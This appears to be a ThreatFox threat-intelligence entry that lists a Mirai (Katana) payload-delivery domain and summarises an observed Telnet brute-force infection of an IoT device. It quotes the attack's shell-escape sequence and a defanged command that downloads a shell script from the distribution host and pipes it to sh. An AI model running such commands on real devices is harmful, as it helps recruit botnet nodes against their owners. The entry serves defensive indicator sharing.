ThreatFox IOC Database
You are viewing the ThreatFox database entry for domain bins.oceanic-node.su.
Database Entry
| IOC ID: | 1838471 |
|---|---|
| IOC: | bins.oceanic-node.su |
| IOC Type : | domain |
| Threat Type : | payload_delivery |
| Malware: | Mirai |
| Malware alias: | Katana |
| Confidence Level : | Confidence level is elevated (75%) |
| Is compromised? : | False |
| First seen: | 2026-06-27 06:24:37 UTC |
| Last seen: | never |
| UUID: | 7c6b3d6e-71b4-11f1-97fa-42010aa4000a |
| Reporter |  Speculus |
| Reward | 5 credits from ThreatFox |
| Tags: | IoT Mirai telnet |
| Reference: | https://speculus.co/search?ip=59.126.16.66 |
Speculus
Activity Timestamp : 2026-06-26T22:57:24ZSummary: Following a Telnet brute-force login against an exposed IoT/DVR-class device on tcp/23, the actor ran the standard Mirai CPE shell-escape sequence (shell/enable/system/linuxshell/ping;sh) and the BusyBox applet fingerprint '/bin/busybox FASTCAT', then attempted to download and execute a second-stage shell script from a single distribution host via three fallback methods (HTTP wget, TFTP, FTP). Activity is consistent with Mirai (alias Katana) IoT botnet recruitment.
Hueristic Detection:
* Target Vector: T1110.001 (Brute Force: Password Guessing) / T1059.004 (Unix Shell) / T1105 (Ingress Tool Transfer)
* IP Address: 59[.]126[.]16[.]66 (infected bot, source)
* Target Port: 23 (Telnet/TCP)
* Execution Footprint: `/bin/busybox wget hxxp://bins[.]oceanic-node[.]su/wget.sh -O- | sh`
* Distribution Host: bins[.]oceanic-node[.]su (also TFTP tftp.sh, FTP ftpget.sh)
Reference: https://speculus.co/search?ip=59.126.16.66